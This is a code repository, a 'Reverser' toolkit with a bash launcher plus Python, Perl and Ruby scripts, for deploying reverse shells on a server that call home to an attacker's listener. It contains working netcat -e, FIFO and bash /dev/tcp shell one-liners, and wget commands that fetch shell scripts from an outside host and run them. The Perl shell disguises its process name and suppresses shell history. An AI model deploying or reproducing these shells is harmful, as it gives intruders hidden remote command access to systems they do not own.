├── README.txt ├── reverser.sh └── scripts ├── php-reverse.tar.gz ├── pi.py ├── pl-reverse.pl └── ruby-reverse.rb /README.txt: -------------------------------------------------------------------------------- 1 | README FOR REVERSER SCRIPT 2 | 3 | NAME: REVERSER.SH 4 | DESC: Quick Reverse Connection Deployment Script 5 | VERSION: 1 6 | AUTHOR: Hood3dRob1n 7 | 8 | INSTRUCTIONS: 9 | A) Upload Script to Server 10 | B) chmod +x reverser.sh 11 | C) ./reverser.sh <#1-8> IP PORT 12 | 13 | Once launched it will create reverse connection using your method of choice and call home to IP given on designated port. Dont forget to set your local listener up before running! 14 | 15 | USAGE: ./reverser.sh <#1-8> IP PORT 16 | EX: ./reverser.sh 6 192.168.1.22 5151 17 | 18 | OPTIONS: 19 | 1) Pentestmonkey PHP Reverse Shell 20 | 2) NETCAT with GAPING_SECURITY_HOLE enabled 21 | 3) NETCAT with GAPING_SECURITY_HOLE disabled - Backpipe Method 22 | 4) NETCAT with GAPING_SECURITY_HOLE disabled - FIFO Method 23 | 5) Bash /dev/tcp socket method 24 | 6) Pentestmonkey Perl Reverse Shell 25 | 7) Python Reverse Shell by Pi 26 | 8) MagicC0d3r Ruby Reverse Shell 27 | 28 | NOTE: I have hosted the external connection scripts on my own hosting site for general usage. You can download the scripts through github and can host where you like. Simply change line 13 to point to where you put them and possibly alter wget calls as needed or follow the same path conventions on your hosting setup (just place in scripts/ folder on hosting and should be fine) 29 | 30 | 31 | A FEW CREDITS DUE: 32 | pentestmonkey@pentestmonkey.net for the Perl & PHP based reverse conneciton scripts. I made very minor mods to them to allow processing via scripted method, nothing else. Thanks for an awesome site and lots of neat scripts! 33 | 34 | MagicC0d3r for the great Ruby based script! 35 | 36 | Pi, my good friend, for the great Python based option! 37 | -------------------------------------------------------------------------------- /reverser.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Quick Reverse Connection Deployment Script 3 | # By Hood3dRob1n 4 | # 5 | # Upload Script to Server, chmod +x reverser.sh, ./reverser.sh <#1-8> IP PORT 6 | # Will create reverse connection using your method of choice and call home to IP given on designated port 7 | # Dont forget to set your listener up before running.... 8 | 9 | # Set variables 10 | METHOD="$1" 11 | HOME="$2" 12 | PORT="$3" 13 | LINK="http://inf0rm3r.webuda.com/" 14 | 15 | # Usage details 16 | usage_info(){ 17 | cat << "EOT" 18 | USAGE: ./reverser.sh <#1-8> IP PORT 19 | EX: ./reverser.sh 6 192.168.1.22 5151 20 | 21 | OPTIONS: 22 | 1) Pentestmonkey PHP Reverse Shell 23 | 2) NETCAT with GAPING_SECURITY_HOLE enabled 24 | 3) NETCAT with GAPING_SECURITY_HOLE disabled - Backpipe Method 25 | 4) NETCAT with GAPING_SECURITY_HOLE disabled - FIFO Method 26 | 5) Bash /dev/tcp socket method 27 | 6) Pentestmonkey Perl Reverse Shell 28 | 7) Python Reverse Shell by Pi 29 | 8) MagicC0d3r Ruby Reverse Shell 30 | 31 | EOT 32 | exit 0; 33 | } 34 | 35 | # Pentestmonkey PHP Reverse Shell with HR mods 36 | PPHP(){ 37 | echo 38 | if [ -d php-reverse ]; then 39 | rm -r php-reverse 40 | fi 41 | mkdir php-reverse 42 | cd php-reverse 43 | wget $LINK/scripts/php-reverse.tar.gz 2> /dev/null 44 | tar -zxvf php-reverse.tar.gz 2> /dev/null 45 | chmod +x php-reverse.php 46 | echo 'Deploying shell, be ready to catch the call home...' 47 | php -f php-reverse.php $HOME $PORT 48 | cd .. 49 | } 50 | 51 | # Netcat -e Gaping Hole Enabled Option 52 | NETCAT_e(){ 53 | echo 54 | command -v nc >/dev/null 2>&1 || { echo >&2 "Netcat isn't installed! Can't use this option without it..."; exit 0; } 55 | echo "OK, launching standard Netcat reverse shell now..." 56 | nc -e /bin/sh $HOME $PORT 57 | } 58 | 59 | # NO -e option, so use Backpipe Method 60 | NETCAT_backpipe(){ 61 | echo 62 | command -v nc >/dev/null 2>&1 || { echo >&2 "Netcat isn't installed! Can't use this option without it..."; exit 0; } 63 | echo "OK, that's all we need, launching Netcat backpiped reverse shell now..." 64 | mknod backpipe p && nc $HOME $PORT 0backpipe 65 | } 66 | 67 | # NO -e option, so use FIFO Method 68 | NETCAT_fifo(){ 69 | echo 70 | command -v nc >/dev/null 2>&1 || { echo >&2 "Netcat isn't installed! Can't use this option without it..."; exit 0; } 71 | echo "OK, that's all we need, launching Netcat backpiped reverse shell now..." 72 | rm /tmp/f 2> /dev/null 73 | mkfifo /tmp/f 74 | cat /tmp/f | /bin/sh -i 2>&1 | nc $HOME $PORT > /tmp/f 75 | } 76 | 77 | # Straight /dev/tcp connection 78 | dev_tcp(){ 79 | echo 80 | echo "OK, launching bash and /dev/tcp scoket based reverse shell now..." 81 | /bin/bash -i > /dev/tcp/$HOME/$PORT 0<&1 2>&1 82 | } 83 | 84 | # Pentestmonkey Perl Reverse Shell 85 | PPerl(){ 86 | echo 87 | echo 'Fetching pentestmonkey Perl reverse shell script...' 88 | wget $LINK/scripts/pl-reverse.pl 2> /dev/null 89 | chmod +x pl-reverse.pl 90 | echo 'Deploying pentestmonkey Perl reverse shell...' 91 | ./pl-reverse.pl $HOME $PORT 92 | } 93 | 94 | #Python Reverse Shell by Pi from HF 95 | PiPython(){ 96 | echo 97 | echo "OK, fetching Pi's Python Revesrse Shell..." 98 | wget $LINK/scripts/pi.py 2> /dev/null 99 | chmod +x pi.py 100 | echo "Deploying Pi's Python Revesrse Shell..." 101 | ./pi.py $HOME $PORT 102 | } 103 | 104 | # MagicC0d3r Ruby Reverse Shell 105 | ruby_magic(){ 106 | echo 107 | command -v ruby >/dev/null 2>&1 || { echo >&2 "Ruby isn't installed! Can't use this option without it..."; exit 0; } 108 | echo "OK, fetching Ruby reverse shell now..." 109 | if [ -d ruby-reverse ]; then 110 | rm -r ruby-reverse 111 | fi 112 | mkdir ruby-reverse 113 | cd ruby-reverse 114 | wget $LINK/scripts/ruby-reverse.rb 2> /dev/null 115 | chmod +x ruby-reverse.rb 116 | echo 'Deploying Ruby Reverse Shell, hope you have your listener ready...' 117 | ruby ruby-reverse.rb $HOME $PORT 118 | cd .. 119 | } 120 | 121 | #MAIN!!!!!!!!!!!!!!!! 122 | #Confirm arguments passed properly (should probably replace later with while getopts style statement but this is it for now 123 | if [ -z "$1" ] || [ "$#" -ne 3 ] || [ "$1" == "-h" ] || [ "$1" == "--help" ]; then 124 | usage_info 125 | else 126 | if [ "$1" -eq 1 ]; then 127 | echo 128 | PPHP 129 | fi 130 | if [ "$1" -eq 2 ]; then 131 | echo 132 | NETCAT_e 133 | fi 134 | if [ "$1" -eq 3 ]; then 135 | echo 136 | NETCAT_backpipe 137 | fi 138 | if [ "$1" -eq 4 ]; then 139 | echo 140 | NETCAT_fifo 141 | fi 142 | if [ "$1" -eq 5 ]; then 143 | echo 144 | dev_tcp 145 | fi 146 | if [ "$1" -eq 6 ]; then 147 | echo 148 | PPerl 149 | fi 150 | if [ "$1" -eq 7 ]; then 151 | echo 152 | PiPython 153 | fi 154 | if [ "$1" -eq 8 ]; then 155 | echo 156 | ruby_magic 157 | fi 158 | fi 159 | # Greetz to and from INTRA! 160 | # Enjoy! 161 | #EOF 162 | -------------------------------------------------------------------------------- /scripts/php-reverse.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hood3dRob1n/Reverser/e81cbfd73a3955ce1d986b54fec6e336eb659985/scripts/php-reverse.tar.gz -------------------------------------------------------------------------------- /scripts/pi.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import os, socket, sys 3 | 4 | #Provide geenral usage statement fo rnewbies 5 | def usage(): 6 | print ''' 7 | +----------------------------+ 8 | | scriptname.py IP PORT | 9 | |--------e-x-a-m-p-l-e-------| 10 | | script.py 192.168.1.2 9999 | 11 | +----------------------------+''',exit() 12 | 13 | #Put down an interupt catcher 14 | def signalHandler(signal, frame): 15 | print("[!] CTRL+C received [!] shutting down now..."); 16 | sys.exit() 17 | 18 | 19 | if len(sys.argv) < 3:usage() 20 | 21 | #Establish our throw back using IP and PORT passed at run time 22 | s=socket.socket() 23 | s.connect((sys.argv[1],int(sys.argv[2]))) 24 | #Print pretty banner upon connect in 25 | 26 | s.send(''' 27 | __ 28 | ___ ___ _ _ ___ | | 29 | ___| | | |_ ___ _| | |_ _ _ ___| | 30 | | _| | | | | _|___| . | | | | | | |__| 31 | |_| |___|___|_| |___|___|_____|_|_|__| 32 | 33 | A Python Reverse Shell By: Pi 34 | 35 | 36 | Type "exit" to exit the shell\n[r00t-d0wn]cmd>''') 37 | 38 | while 1: 39 | data = s.recv(512) 40 | if data.lower()=="q": 41 | s.close() 42 | break; 43 | else: 44 | if data.startswith('exit'): 45 | s.close() 46 | break; 47 | else: 48 | result=os.popen(data).read() 49 | if (data.lower() != "q"): 50 | s.send(str(result)+"[r00t-d0wn]cmd>") 51 | else: 52 | s.send(str(result)) 53 | s.close() 54 | break; 55 | exit() 56 | -------------------------------------------------------------------------------- /scripts/pl-reverse.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl -w 2 | # perl-reverse-shell - A Reverse Shell implementation in PERL 3 | # Copyright (C) 2006 pentestmonkey@pentestmonkey.net 4 | # 5 | # This tool may be used for legal purposes only. Users take full responsibility 6 | # for any actions performed using this tool. The author accepts no liability 7 | # for damage caused by this tool. If these terms are not acceptable to you, then 8 | # do not use this tool. 9 | # 10 | # In all other respects the GPL version 2 applies: 11 | # 12 | # This program is free software; you can redistribute it and/or modify 13 | # it under the terms of the GNU General Public License version 2 as 14 | # published by the Free Software Foundation. 15 | # 16 | # This program is distributed in the hope that it will be useful, 17 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 18 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 19 | # GNU General Public License for more details. 20 | # 21 | # You should have received a copy of the GNU General Public License along 22 | # with this program; if not, write to the Free Software Foundation, Inc., 23 | # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. 24 | # 25 | # This tool may be used for legal purposes only. Users take full responsibility 26 | # for any actions performed using this tool. If these terms are not acceptable to 27 | # you, then do not use this tool. 28 | # 29 | # You are encouraged to send comments, improvements or suggestions to 30 | # me at pentestmonkey@pentestmonkey.net 31 | # 32 | # Description 33 | # ----------- 34 | # This script will make an outbound TCP connection to a hardcoded IP and port. 35 | # The recipient will be given a shell running as the current user (apache normally). 36 | # 37 | # Minor mod to setting IP & Port as arguments passed at run time so I can use within reverser 38 | # H.R. :) 39 | use strict; 40 | use Socket; 41 | use FileHandle; 42 | use POSIX; 43 | my $VERSION = "1.0"; 44 | 45 | # Where to send the reverse shell. Change these. 46 | my $ip = "$ARGV[0]"; 47 | my $port = "$ARGV[1]"; 48 | 49 | # Options 50 | my $daemon = 1; 51 | my $auth = 0; # 0 means authentication is disabled and any 52 | # source IP can access the reverse shell 53 | my $authorised_client_pattern = qr(^127\.0\.0\.1$); 54 | 55 | # Declarations 56 | my $global_page = ""; 57 | my $fake_process_name = "/usr/sbin/apache"; 58 | 59 | # Change the process name to be less conspicious 60 | $0 = "[httpd]"; 61 | 62 | # Authenticate based on source IP address if required 63 | if (defined($ENV{'REMOTE_ADDR'})) { 64 | cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}"); 65 | 66 | if ($auth) { 67 | unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) { 68 | cgiprint("ERROR: Your client isn't authorised to view this page"); 69 | cgiexit(); 70 | } 71 | } 72 | } elsif ($auth) { 73 | cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address. Denying access"); 74 | cgiexit(0); 75 | } 76 | 77 | # Background and dissociate from parent process if required 78 | if ($daemon) { 79 | my $pid = fork(); 80 | if ($pid) { 81 | cgiexit(0); # parent exits 82 | } 83 | 84 | setsid(); 85 | chdir('/'); 86 | umask(0); 87 | } 88 | 89 | # Make TCP connection for reverse shell 90 | socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp')); 91 | if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) { 92 | cgiprint("Sent reverse shell to $ip:$port"); 93 | cgiprintpage(); 94 | } else { 95 | cgiprint("Couldn't open reverse shell to $ip:$port: $!"); 96 | cgiexit(); 97 | } 98 | 99 | # Redirect STDIN, STDOUT and STDERR to the TCP connection 100 | open(STDIN, ">&SOCK"); 101 | open(STDOUT,">&SOCK"); 102 | open(STDERR,">&SOCK"); 103 | $ENV{'HISTFILE'} = '/dev/null'; 104 | system("w;uname -a;id;pwd"); 105 | exec({"/bin/sh"} ($fake_process_name, "-i")); 106 | 107 | # Wrapper around print 108 | sub cgiprint { 109 | my $line = shift; 110 | $line .= "

\n"; 111 | $global_page .= $line; 112 | } 113 | 114 | # Wrapper around exit 115 | sub cgiexit { 116 | cgiprintpage(); 117 | exit 0; # 0 to ensure we don't give a 500 response. 118 | } 119 | 120 | # Form HTTP response using all the messages gathered by cgiprint so far 121 | sub cgiprintpage { 122 | print "Content-Length: " . length($global_page) . "\r 123 | Connection: close\r 124 | Content-Type: text\/html\r\n\r\n" . $global_page; 125 | } 126 | -------------------------------------------------------------------------------- /scripts/ruby-reverse.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | # Ruby Reverse Shell 3 | # MagicC0d3r@gmail.com 4 | # www.magiccoder.ir www.sun-army.org 5 | # License : GNU General Public License (GPL) 6 | #Usage : ruby reverse.rb IP PORT 7 | #Example: ruby reverse.rb 127.0.0.1 1370 8 | 9 | 10 | require 'net/telnet' 11 | 12 | if (ARGV[1] == nil) 13 | puts "\n\t MagicC0d3r Ruby Reverse Shell\n\tw/ mods for r00t-d0wn by Hood3dRob1n\n" 14 | puts "\nUsage\t: ruby reverse.rb \nExample\t: ruby reverse.rb 127.0.0.1 1370\n\n" 15 | else 16 | server = Net::Telnet::new('Host'=>ARGV[0],'Port'=>ARGV[1].to_i,'Timeout'=>300) 17 | server.puts "\n\t MagicC0d3r Ruby Reverse Shell\n\tw/ mods for r00t-d0wn by Hood3dRob1n\n" 18 | puts "Connected to #{ARGV[0]}:#{ARGV[1].to_i}" 19 | loop do 20 | server.print "[r00t-d0wn]$cmd> " 21 | command = server.gets 22 | break if command.chomp == "exit" 23 | server.print `#{command.to_s}` 24 | end 25 | puts "Disconnected" 26 | end 27 | --------------------------------------------------------------------------------